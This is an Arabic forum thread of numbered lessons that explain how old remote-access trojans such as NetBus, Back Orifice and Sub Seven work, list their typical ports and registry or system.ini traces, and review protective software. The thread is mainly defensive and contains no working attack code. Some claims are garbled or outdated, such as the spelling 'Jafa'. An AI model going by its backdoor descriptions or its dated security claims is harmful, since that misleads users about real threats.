مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت. حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:
أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.
3) عن طريق الكوكي Cookie :
يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي Cookie وهي عباراة عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب . هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من خلال المتصفح او ببعض البرامج كالجارد دوق . وبعد فإن ميكانيكية الأختراق تتم مبدئيا بوضع بريمج الخادم بجهاز الضحية ويتم الأتصال به عبر المنفذ port الذي فتحة للمستفيد (المخترق) في الطرف الأخر ولكن حلقة الوصل هذة تنقصها المعابر وهي البرامج المخصصة للأختراق وهذة الأخيرة سأتطرق اليها في الحلقة الدراسية القادمة إن شاء الله حيث سأشرح كيف تعمل برامج الأختراق ، وكيف علينا أن نتعامل معها ، وكيف نوهم المخترق بنجاح إختراقة بينما هو يجري خلف سراب
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثالث والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:15 am


الدرس الثالث والثلاثين
البرامج المؤذية - Harmful Software

الاختراق ليس الا احد انواع التدمير الممكنه عبر البرامج المؤذية ، لذلك فالمخاطر التي يتعرض لها مستخدم الكمبيوتر العادي تتنوع بتنوع واختلاف البرامج المؤذية وامكاناتها وإن كان الاختراق هو اخطرها وابرزها.
المخاطر وانواع البرامج المؤذية:
تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:
1- القتابل وبرامج الطوفان Flooders/Bombers حيث يفاجأ المستخدم بوجود مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث انه يسبب ازعاجا ومضيعا للوقت لا اكثر .
2- الخداع Spoofing شرحت هذا الخطر سابقا وهو عملية تمويه وطمس للهويه حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات لم يكتبها في حقيقة الأمر المستخدم الحقيقي.
3- التدمير من خلال برامج الـ Nukers تقوم هذة البرامج بتعطيل نظام التشغيل ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام التشغيل ذاته.
4- الباب الخلفي Backdoor هذا الصنف هو الأخطر وهو المحور الذي يدور حوله موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن طريقة يتم دخول المخترقين لجهاز الضحية .
أشهر برامج الأختراق وكيفية عمل كل منها:
كثيرة هي برامج الأختراق ومتعدده ولكن هناك نظرية سائدة تشمل الجانب النفسي للمخترقين وهي البساطة في التعامل مع برنامج الأختراق والحصول على ما خف وزنه وغلاء ثمنه من جهاز الضحيه Easy to Go ، وبمعنى أخر فأن المخترق لايرغب في برنامج معقد يأخذ كثيرا من الوقت في تعلمه وكذلك لايرغب بعد تعلم البرنامج واتقانه الدخول الي جهاز خاوي لاسمن فيه ولاعسل . لهذا السبب نجد بأن هناك ثلاثة برامج شهيرة ومعروفة يستخدمها المخترقون في كل أرجاء المعمورة لبساطة تعلمها وسهولة إتقانها وفي نفس الوقت خطورة ما تقوم به . هذة البرامج الثلاث سأشرحها بالتفصيل مركزا على ثلاثة عوامل فيهم (1) إمكانات كل برنامج (2) كيفية إكتشافة في الأجهزة (3) كيفية التخلص منه وجعل المخترق يجري خلف سراب .
برامج الأختراق المتداولة:
هذة قائمة بأشهر البرامج المتداولة مرتبة حسب خطورتها ، وسأكتفي بشرح الثلاثة الأولى منها لشهرتها وتداولها بين المخترقين في ارجاء المعمورة قاطبة:
1- Net Bus
2- Back Orifice
3- Sub Seven
4- Hack a Tack
5- Master Paradise
6- Deep Throat
7- Girl Friend
8- Net Sphere
9- Win Crash
10- Big Cluck
11- Executer
1- برنامج الـ Net Bus : تمكن مبرمج سويدي إسمه كارل نيكتر في عام 1998 من إصدار نسخة تجريبيه تعمل على الويندوز 95 من برنامج لم يطلق عليه اسما وقتها . ذلك البرنامج يمكن مستخدمه من تشغيله بواسطة كمبيوتر بعيد (ريموت) بنفس الفكرة التي ذكرتها في الفصل السابق هذا البرنامج سماه اتوبيس الشبكة Net Bus صدرت بعد ذلك نسخ عديده منه اذكر منها نسخة 1.6 و 1.7 و Net Bus Pro وأخيرا Net Bus 2000 .
إمكانات برنامج Net Bus : يسمح البرنامج لأي شخص بالسيطرة على جهاز الضحية عن بعد (ريموت) بالشكل التالي:
1- عرض صورة مفاجئة على شاشة الضحية او تغيير اعدادات الشاشة دون تدخل من المستخدم
2- استبدال مفاتيح الماوس الأيمن والايسر
3- تشغيل برنامج معين بصورة مفاجئة
4- فتح و غلق باب سواقة الـ CD تلقائيا دون تدخل من المستخدم
5- عزف اي ملف صوتي فجأه
6- وضع مؤشر الماوس في نطاق معين من الشاشة لا يستطيع المستخدم ان يتعداه
7- تحريك مؤشر الماوس دون ان يفعل ذلك المستخدم الاصلي
8- عرض رسالة قصيرة على الشاشة تختفي فجأة او تبقى معلقة دائما بالشاشة لايستطيع المستخدم التخلص منها.
9- قفل واعادة تشغيل الجهاز Rebooting بطريقة مفاجئة
10- الذهاب الي موقع معين على الويب
11- التجسس على المستخدم ورؤية اية كلمات يكتبها
12- التقاط صور لسطح المكتب عن بعد
13- ارسال معلومات لكومبيوتر المخترق عبر بريمج الباتش المزروع بجهاز الضحية
14- عرض محتويات القرص الصلب بالكامل عن بعد
15- انزال downloading اي ملف من جهاز الضحية لجهاز المخترق
16- تحميل upload اي ملف من جهاز المخترق لجهاز الضحيه
17- التحكم في علو وانخفاض الصوت
18- في حالة ارتباط مايكروفون بجهاز الضحية فيمكن للمخترق الأستماع لما يدور من حديث بالغرفة المتواجد بها جهاز الضحية
19- حذف اي ملف من القرص الصلب عن بعد
20- الغاء disable عمل مفاتيح معينه من لوحة المفاتيح
21- اقفال اي نافذة من النوافذ المفتوحة بشاشة الضحية
22- فتح نوافذ معينه بطريقة مفاجئة
23- اضافة كلمة سر لجهاز الضحية تمنعه من الدخول لجهازه
24- تغيير او حذف كلمات السر الخاصة بالضحية واستبدالها بكلمات اخرى
25- تغيير اعدادات النظام بالجهاز الخاص بالضحيه كل هذة الوظائف السابقة يمكن لأي مخترق لديه هذا البرنامج او اي برنامج للأختراقات مع اختلاف قدراتها أن يستخدمها على كمبيوتر الضحية المزروع به الملف الخادم (ملف الباتش).
قد يسبب ما ذكرت اعلاه شئ من الخوف او الوسوسة لمن ظهر في جهازه احد او بعض الأعراض المذكوره ولكني انصحه ان لا يستعجل الأمور وقبل اتخاذه لأي قرار عليه اولا الكشف على جهازه والبحث عن اي ملف تجسسي مزروع به عن طريق الوسائل الثلاث التي ذكرتها في الفصل الأول . هذا من جانب ، اما جانب اخر فأن المخترق لكي يتمكن من الأختراق عليه الدخول من احد المنافذ ports والبرامج المضادة للمخترقين والتي ساشرحها في الفصل الثالث إن شاء الله كفيلة بأغلاق تلك المنافذ في وجه المخترق ولكن حتى نقطع الطريق هنا على المخترق فإليكم طريقة فذة لأكتشاف المنافذ المفتوحة واغلاقها بطريقة يدويه من خلال الويندوز ويجب تنفيذ هذا الأجراء اثناء الإتصال بالأنترنت online :
1- من قائمة إبداء اختر تشغيل
2- عند ظهور مربع الحوار الخاص بتنفيذ الأوامر اكتب Command
3- سيظهر لك اطار نظام التشغيل دوس وفي داخل الأطار وامام خانة المؤشر اكتب : netstat-a ثم اضغط Enter
4- عند تنفيذ الخطوة السابقة سيتم عرض جميع المنافذ المفتوحة بجهازك وهي التي تلي الرمز (: ) مباشرة ، أما ماقبل الرمز فهو اسم الكمبيوتر الخاص بك الذي تم تعريفه عند تجهيز شبكة الأتصال .
5- والأن قارن ارقام المنافذ التي ظهرت لك مع ارقام المنافذ التالية وهي المنافذ التي يفتحها في العادة ملف التجسس (الباتش) لبرنامج الـ Net Bus فإن وجدت رقم المنفذ ضمنها فإن جهازك قد أخترق وعليك في هذة الحالة التخلص اولا من ملف التجسس كما تم شرحة في الفصل السابق ثم اغلاق المنفذ
المفتوح كما سيتم شرحة لاحقا:
منافذ Ports دخول برنامج النت باص :
20034
1045
4590
6711
7300
7301
7306
7303
7308
30029
30100
30101
30102
31337
31338
31339
التخلص من برنامج النت باص واغلاق منافذه المفتوحة: الرابط الرئيسي بين كمبيوتر المخترق وكمبيوتر الضحية هو ملف التجسس المزروع بالأخير ومتى ماتم تحديده والتخلص منه قطعت عليه سبل التجسس اما المنافذ التي فتحت فهي كما شرحناها بالفصل السابق جزء من الذاكرة يتعرف عليها الجهاز بانها منطقة اتصال ومتى ما تم حذف ملف التجسس (الباتش) فأن الويندوز يعيد اغلاق تلك المنافذ عقب اعادة تشغيل الجهاز لأن مصدرها (ملف الباتش) قد قضي عليه.
2- برنامج Black Orifice : الفجوة السوداء ثاني اشهر برنامج للأختراق وأقدمها يعطي سيطرة كاملة للمخترق وابرز اصدارته السابقة يحمل النسخة رقم 1.2 وقد أصدرت الجمعية التي تصدرة وأسمها "جمعية البقرة الميته" Cult of Death Cow اعلانا بأطلاق اصدارة جديدة منه في نهاية الصيف السابق سمته Black Orifice 2000 . يقوم البرانامج كما ذكرنا بأعطاء سيطرة كاملة للمخترق وتظهر بجهاز الضحية نفس الأعراض التي ذكرتها سابقا .
البحث عن منافذ دخول هذا البرنامج:
قم بأجراء البحث عن المنافذ كما تم شرحه اعلاه التي عادة يدخل منها برنامج الـفجوة السوداء وقارنها بالمنافذ في القائمة ادناه فإن وجدتها من ضمن هذه القائمة فأن جهازك يكون قد اخترق عن طريق هذا البرنامج:
31338
31337
31666
54320
54321
أكتشاف ملف التجسس الخاص بهذا البرنامج:
قم بنفس الأجراء الذي شرحته بالفصل الأول للكشف عن ملف الباتش وبعد الدخول لملف تسجيل الويندوز توقف عند Current Version . الأن أنقر على المجلد RunServices وابحث عن اي ملف غريب بجهازك له امتداد exe ( أنت اعرف بجهازك من الأخرين) . إن وجدت اي ملف غريب لم تشاهده بجهازك من قبل فأنقر عليه بزر الماوس الأيمن ثم احذفه واخرج من ملف تسجيل الويندوز . اعد تشغيل الجهاز وتوجة الي مجلد الـ System في اعدادات بقائمة إبداء. الأن ابحث عن ملف يحمل نفس اسم الملف الغريب الذي حذفته وإذا لم تجده فأنقر قائمة (عرض) ثم ( خيارات المجلد) ثم (عرض) من قائمة الملفات المختفيه ثم ضع علامه على (اظهار جميع الملفات) ثم انقر تطبيق فموافق. ستعود مرة اخرى الي مجلد System فإذا وجدت الملف المطلوب فقم بمسحة وستجد ملفا اخر اسمه windll.dll قم بحذفه هو ايضا واعد تشغيل الجهاز . الأن تكون قد قطعت الطريق على المخترق وجعلته يبحث عن سراب.
3- برنامج Sub Seven : من اشهر البرامج المستخدمة بمنطقة الخليج ، يسمونه "القنبله" وهو مرغوب ومطلوب وشعبي لبساطته وسهولة تعلمه وسهولة الأختراق عن طريقة . يتميز بمخادعة الشخص الذي يحاول ازالته فهو يعيد تركيب نفسه تلقائيا بعد حذفه من ملف التسجيل بالويندوز بالطرق الثلاث التي ذكرتها في الفصل السابق ولكن هناك طريقة جديدة وخارقه لحذفه سأشرحها لاحقا.
قبل شرح اعراض الاصابة التي يتركها هذا البرنامج بجهاز الضحية تأكد اولا من عدم فتح منافذ الاتصال الخاصة به في جهازك بنفس الطريقة السابقة وقارنها بالمنافذ التاليه فإن وجدتها فأن جهازك حتما مصاب وعليك متابعة الموضوع للتخلص من المخترق:
6711
6776
1243
1999
أعراض الأصابة :
تختلف اعراض اصابه هذا البرنامج عن البرنامجين السابقين فمن أهم أعراض اصابه هذا البرنامج ظهور رسالة شهيرة عند كل مرة يدخل فيها المخترق لجهاز الضحيه وهي ( قام هذا البرنامج بأنجاز عملية غير شرعيه ....) !! تريثوا .. لايعني من رأى منكم هذة الرسالة على شاشته أن جهازه قد اخترق .. قلنا بأن في هذا البرنامج الكثير من الخبث مما جعله مرغوبا خصوصا بمنطقة الخليج ، فهو حينما يعطي رسالة كهذه إنما يوهم المخترق بـأن هذه الرسالة شائعة ومعروفه ومن تظهر له فقد تعود عليها فلن يشك مطلقا قبل قراءة هذه الأسطر في أن جهازه قد اخترق . كيف نميز بين الرسالة الصادقة البريئة والرسالة الكاذبه الخبيثة؟؟
1- افتح ملف الـ win.ini الموجود بمجلد الويندوز وابحث في بداية السطور الأولى عن اي قيم شبيهة بالقيم التاليه:
run = xxxx.exe او run = xxxx.dl
load = xxxx.exe او load = xxxx.dl
لاحظ أن xxxx تعني اسم الخادم فإذا عثرت على اي قيمة منها فأحذفها فورا وبمعنى اخر يجب أن لايظهر اي سطر من السطور اعلاه في بداية السطور الأولى لملف الـ win.ini فإن ظهر فأحذفه على الفور.
2- افتح الملف system.ini الموجود بمجلد الويندوز وستجد بالسطر الخامس العبارة التالية :
Shell = Explorer.exe
إن كان جهازك مصابا فستجد شكل العبارة السابقة يكون هكذا:
Shell = Explorer.exe xxx.exe او shell = Explorer.exe xxx.exe
مع العلم بأن xxx هو اسم الخادم زمن اشهر اسمائة : rundlll6.exe و
Task_Bar.exe
أن وجدت جهازك مصابا فقم بمسح اسم الخادم فقط ليصبح السطر كما يلي :
shell=Explorer.exe
والأن انت تكون قد قطعت الطريق بين ملف التجسس واسم الخادم الخاص به ونشبه ذلك بمن قطع جهاز التنفس عن المريض فلا يبقى الا دفنه وعليك القيام بحذف ملف التجسس الخاص بهذا البرنامج كما تم شرحة في الفصل الأول . وبعد فكما رأينا خطورة الأختراق فإن الوقاية خير من العلاج والوقاية الأولى هي عدم السماح بزرع ملفات التجسس في اجهزتنا فهي حلقة الوصل الأولى لدخول المخترقين اليها .
في الحلقة الدراسية القادمة إن شاء الله سأشرح طرق الوقاية بتفصيل اكثر وسنتعلم كيفية استخدام البرامج المضادة لبرامج الاختراقات التي تم شرحها اليوم وايضا سنصل لمحور حديث هذة الحلقات الدراسية وهو الدفاع الذاتي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الرابع والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:16 am


الدرس الرابع والثلاثين

مع التطور المستمر لطرق واساليب الاختراق ، كان لزاما ان تتطور في مقابلها وسائل وطرق للحماية. ولأهمية هذا الموضوع بالنسبة للمسؤولين عن الأنظمة والمزودات فقد كان الاهتمام بأمن وحماية المزودات من المخاطر الأمنية كبير جدا ولا تخلوا اليوم شركة من قسم يختص بأمن وسلامة المعلومات .

ولكن في المقابل حينما نتحدث عن حماية الأجهزة الشخصية- وهو المحور الرئيسي لهذه الدورة الدراسية- نجد بأن هناك قصورا كبيرا من المستخدمين في حماية اجهزتهم وهوعامل اصبح لزاما على كل المستخدمين إدراكه من خلال ما تم شرحة في الحلقات الدراسية السابقة . وقد انتشرت برامج الحماية والبرامج المضادة للاختراقات انتشارا كبيرا قد يصاب معه المستخدم بالحيرة فيما يختاره منها خصوصا اذا ما ادركنا بأن بعض – وليس كل تلك البرامج- تقوم هي ذjنها بأنشطه تجسسية لصالح الشركة المصنعه لها ولكنه لا يكون سواء تجسس إحصائي لمعرفة عدد المستخدمين للبرنامج المذكور ، اما مانسمعه من وجود برامج للحماية تقوم تلقائيا بفتح منافذ معينه بالأجهزة فأن هذا لم يثبت بعد في تقارير رسمية والشركات تدرك اليوم بأن المستخدم العادي وفي اي بلد كان على جانب كبير من الوعي الذي يؤهله لأكتشاف الثغرات الأمنيه بالبرنامج –ان وجدت- وشركات كتلك تهمها السمعه اولا وأخيرا لأن ذلك يتوقف عليه نجاحها في السوق وبالتالي مكسبها وخسارتها.
طرق برامج الحماية :
للحماية من الاختراقات والتجسس هناك عدة طرق تستخدمها برامج الحماية لأداء مهامها ويمكن تصنيف هذه الطرق الي اربعة على النحو التالي:
1- تخزين قاعدة بيانات بالبرنامج تخزن فيه عدد كبير من اسماء احصنه طرواده ويتم عمل مسح لكافة الملفات الموجودة بجهاز المستخدم ومطابقتها مع الموجود بقاعدة البيانات تلك للتعرف على الملفات المطابقه . يتم تحديث قاعدة البيانات دوريا اما من خلال الاقراص اللينه التي تحدث اولا بأول كما كانت تفعل سابقا شركة مكافي ببرنامجها الشهير انتي فيروس او يتم ذلك مباشرة من خلال الانترنت كما يفعلا نورتون ومكافي في الوقت الحالي .
2- البحث عن وجود تسلسل محدد من الرموز التي تميز كل ملف تجسسي والتي تميز احصنه طروادة وغيرها وهذا الملف يعرف تقنيا بأسم Signature وايضا هذة الطريقة تحدث دوريا كما تم شرحه اعلاه .
3- الكشف عن التغيرات التي تطرأ على ملف التسجيل Registry وتوضيح ذلك للمستخدم لمعرفة ان كان التغيير حصل من برنامج معروف او من حصان طرواده. هذه الطريقة يتبعها برنامج اللوك داوون الشهير.
4- مراقبة منافذ الاتصالات بالجهاز (اكثر من 65000 منفذ) لأكتشاف اي محاولة غير مسموح بها للأتصال بالجهاز المستهدف وقطع الاتـصال تلقائيا واعطاء تنبيه بذلك في حالة وجود محاولة للأختراق . هذة هي طريقة برنامج الجامر المعروف .
سنتاول في هذة الحلقة الدراسية بعض اشهر البرامج المستخدمه للحماية وسنكتفي بشرح الثلاثة الاولى منها لشيوعها بين المستخدمين التقليديين :
1- برنامج Lock Down 2000
الشركة المنتجة : Harbor Telco Security Corp.
الموقع على الأنترنت : http://www.lockdown2000.com/
الحجم : 2 MB
السعر: $ 99
المحاسن : برنامج قوي وشامل للحماية الفردية
العيوب: تنطلق صفارة التحذير عند كل تغيير يحدث بلمف الـ Registry وعند استقبال الكوكيز الغير مضرة للمواقع التي تتم زيارتها. اشهر البرامج المستخدمه للحماية ، يعمل كجدار ناري حيث يقوم بفحص الجهاز عند بدء التشغيل للبحث عن احصنة طروادة ومن ثم الغاء الملف مباشرة مع ترك رسالة تعلم المستخدم بذلك . يمنع كذلك المخترقين ويسجل محاولات الدخول في تقرير مختصر يشمل وقت الدخول وعنوان الـ IP كما انه يعطي معلومات عن جهة الأتصال والبلد.
ملحوظة : اشارت بعض التقارير التي نشرت بكتاب Firewalls and Internet Security الي ان هذا البرنامج قد قام بفتح المنفذين رقمي 12345 و 1243 ببعض الأجهزة المحدوده بالولايات المتحدة خلال عام 1999 ولكن هذة الأتهامات لم تثبت بشكل قاطع كما ان الشركة المنتجه لم تعلق على الموضوع كما ذكر المؤلفين .
2- برنامج Jammer
الشركة المنتجة : Jammersoft Corp.
الموقع على الأنترنت : http://start.at/jammer/
الحجم : 1.6 MB
السعر : $ 19.95
المحاسن : مراقبة تامة لكافة المنافذ (65000) في وقت واحد
العيوب :1- يحمي المستخدم من نفسه عند اختيار الحماية الشامله
2- على المستخدم ادخال كلمة السر عند كل بداية لتشغيل الجهاز قد لايتوقع ان هذا البرنامج ذو السمعة الحسنه هو من انتاج الشباب الفلبيني المتخرجين من جامعة لاديلاس بمانيلا العاصمة . حينما دخلت دول جنوب شرق اسيا الي عالم الانترنت ظهرت في المقابل مافيا جديده تخترق الأنظمه ولأن برامج مضادات الأختراقات هي مكلفه بتلك الدول ولأن الحاجة هي ام الأختراع فقد تمكن ثلة من الشباب الفبيني من تصميم برنامج جيد اسموه الجامر وبالعربية المجمد لأنه يجمد المخترق في مكانه فلا يسمح له بالدخول ولا بالخروج ، يعلقه في موقعه الذي دخل منه حتى يسمح له المستخدم بالخروج.
يقوم الجامر بالحماية من المخترقين خصوصا الذين يستخدمون برنامجي Net Bus و Back Orifice حيث انه يراقب المنافذ لمراقبة اي حركة دخول او خروج للبيانات . ايضا يعطي تنبيها صوتيا مع رسالة موجزه عند محاولة اي شخص للدخول الي الجهاز. يقوم كذلك بأغلاق الثغرات الأمنية التي عاده تترك مفتوحه في برنامج الـ ICQ حيث يغلقها البرنامج بطريقة اليه ودون تدخل من المستخدم . يتحسس الجهاز لوجود ملفات التجسس بداخله حيث يقوم بأزالتها اليا . لديه قدرة اكثر من خارقه على اكتشاف برنامجي التجسس المذكورين اعلاه ويقوم بالغاء بريمجات التجسس الخاصه بهما (ملفات الباتش) اليا كذلك. يوفر ثلاث مستويات للحماية هي على التوالي : الحماية الأوليه عند التشغيل فقط ، والحماية الثانوية عند التشغيل بالأضافة لبعض وسائل الحماية الضرورية الأخرى ، وأخيرا الحماية الشاملة حيث لا يمكن تشغيل اي برنامج من البرامج المخزنه بالجهاز.
3- برنامج Internet Alert 99
الشركة المنتجة : BONZI Software
الموقع على الأنترنت : http://www.bonzi.com/
الحجم : 2.07 MB
السعر : $ 40
المحاسن : سهل وبسيط تعلمه وتشغيله ، قوي ومتين في حمايته ومنعه للمخترقين
العيوب : يسمح للأخرين بالدخول بأذن من المستخدم (او غيره ان كان الجهاز يستخدمه اكثر من مستخدم)
من برامج الحماية القوية يؤدي الحماية على ثلاثة محاور رئيسية وهي : مراقبة شاملة للمنافذ ، واعطاء تنبيه صوتي عند محاولة الدخول ، وتسجيل رقم المخترق IP والوقت والتاريخ ، ولا يكتفي بكل ذلك بل انه يوضح موقع المخترق من خلال خريطه عالميه تشمل جميع شركات الاتصالات بالعالم كما وانه عند تحديد موقع المخترق فأنه يزود المستخدم باسم مزود الخدمه التي مسجل معها المخترقISP ورقم التليفون والبريد الألكتروني . أخيرا يعمل البرنامج في خلفية نظام التشغيل حيث يشغل حيزا قدره 20 كيلوبايت فقط من الذاكرة
4- برنامج Norton AntiVirus 2007
5- برنامج The Cleaner
6- برنامج Guard Dog
7- برنامج Hoe Guard
8- برنامج At Guard
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الخامس والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:17 am


الدرس الخامس والثلاثين
خلال الأسابيع الثلاثة المنصرمة ... تجولت في الأنترنت (بطريقة مختلفه)... من الولايات المتحدة الأمريكية غربا الي اليابان وجنوب شرق اسيا شرقا ، ومن اوروربا واروربا الشرقية شمالا إلي شبة القارة الهندية جنوبا ...

تجوالي اليومي وبمعدل ساعتين كان لهدف معين هو جني اكبر قدر من المعلومات لمساندة ملتزمة الدفاع الذاتي عن أمن المعلومات المخزنه بقواعد بيانات الأقراص الثابته لأجهزة الكمبيوتر الشخصية سواء تلك المنزلية منها او المكتبية.
لم تكن اللغة عائقا في جني بيانات من هذا النوع من المواقع المتعدده والمتشعبه في اعماق الشبكة العنكبوتية العالمية www ، ولكن التحدي الحقيقي كان في غربلة تلك البيانات لإستخلاص المصداقية منها في حقيقة المعلومات المعطاة وحقيقة نجاح تطبيقها . ايضا كان التحدي في ترجمة كثير من المواقع الغير ناطقة بالأنجليزية (الألمانية واليابانية والروسية) الي الأنجليزية ومن ثم ترجمتها الي العربية ناهيك عن ترجمة المواقع الأمريكية وتلك الناطقة بالأنجليزية الي العربية هي الأخرى لنشرها فيما بعد لمن يقراء هذة الرسالة مع العلم بأن الترجمة للإنجليزية قد تمت بواسطة بعض المواقع المتخصصه .
جهد مضني قد بذل لأستخلاص افكار جديده تساند ملتزمة الدفاع الذاتي والتي عن طريقها بإمكان المستخدم العادي للأجهزة الشخصية استغلال تعليمات مبيته بجهازه وأثارتها تكنيكيا لأبتكار جدارا ناريا ذاتيا فولاذيا لايقهر لصد هجوم المخترقين ودون الحاجة الي تحميل تطبيقات وبرامج متخصصه لهذا الغرض.
تستند ملتزمة الدفاع الذاتي (ساتشس) على خمسة أسس مترابطه هي كالتالي :
1- السرية (س) Confidentiality
2- الأمان (أ) Safety
3- التواصل (ت) Connection
4- الشهرة (ش) Notoriety
5- الســبر (س) Probe
وكما يظهر اعلاه فإن كل حرف يمثل مبداء اساسي من ملتزمة الدفاع الذاتي (ساتشس) ومجموعة الحروف الخمسة تكون في مجملها خطا دفاعيا صلبا عند تطبيقاها بديناميكية صحيحه وبتحفز ذاتي للقيم البرمجية المبنية عليها وحدة المعالجة المركزية CPU و نظام التشغيل الخاص بجهاز المستخدم . وبصيغة أخرى فأن ملتزمة الدفاع الذاتي عند تطبيقها على الأجهزة الشخصية تشبة في عملها مايقوم به نظام المناعة الذاتي بالجسم البشري .
لأن ملتزمة الدفاع الذاتي إبتكارا شخصيا ، ولأن هناك جهدا كبيرا قد بذل لأخراجها الي النور ، ولمبداء الأحتفاظ بحقوق الملكية الفكرية
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس السادس والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:18 am


الدرس السادس والثلاثين
الجدار الناري Fire Wall بويندوز XP بروفيشينال ( دورة دراسية خاصة )


يتوفر بإصدارة ويندوز XP بروفيشينال (الخاصة بالأعمال) جدارا ناريا صلدا من اهم مهامة الأساسية
1- التخفي Stealth
2- العمل بقوة في صمت دون مقاطعة المستخدم
3- مساندة الشبكات المحلية
4- الإستغناء كليا وبمصداقية عن تحميل اي تطبيقات خارجية (جدران نارية) لصد عمليات الإختراق
5- سهولة التحميل والتهيئة والعمل في الخلفية دون ادنى تدني لسرعة الجهاز
6- التحديث التلقائي ضمن تحديثات ويندوز XP الدورية
7- الإختبار الفعلي للنظام عبر مركز جيبسون للأبحاث www.grc.com

سأبداء بشرح مفاهيم الجدار الناري الذاتي بالويندوز XP بروفيشينال ووميزاته والفروقات الواضحة والخفيه بينه وبين بقية تطبيقات الجدران النارية المتداوله وستكون الدورة الدراسية هذة في ثلاث حلقات متتابعة .
الحلقة الدراسية الأولى
تعريف الجدار الناري :
الجدار الناري او جدار الحماية او Firewall سمه كما تشاء هو تركيبة من الأجهزة والبرامج التي توفر نظام آمن ، تُستخدم عادةً لمنع الوصول غير المصرح به من الخارج إلى شبكة اتصال داخلية أو إنترانت.
يمنع جدار الحماية الاتصال المباشر بين شبكة الاتصال وأجهزة الكمبيوتر الخارجية بواسطة توجيه الاتصال عبر ملقم وكيل خارج شبكة الاتصال . يقرر الملقم الوكيل فيما إذا كان مرور ملف ما عبر شبكة الاتصال آمناً. يدعى جدار الحماية أيضاً عبارة الحد الآمن.

إن الجدار الناري Firewall هو نظام الأمان الذي يعمل كحد وقائي بين شبكة الاتصال والعالم الخارجي . إن جدار حماية اتصال إنترنت Internet Connection Firewall - ICF هو برنامج لتعيين قيود على نوعية المعلومات المتبادلة بين الشبكة المنزلية أو المكتبية الصغيرة وإنترنت.
يمكن لـ ICF أن يحمي الكمبيوتر المفرد المتصل بإنترنت . إذا كان لديك كمبيوتر مفرد متصل بإنترنت بواسطة مودم الكيبل ، أو مودم DSL ، أو مودم الطلب الهاتفي ، يقوم ICF بحماية اتصالك بالإنترنت .
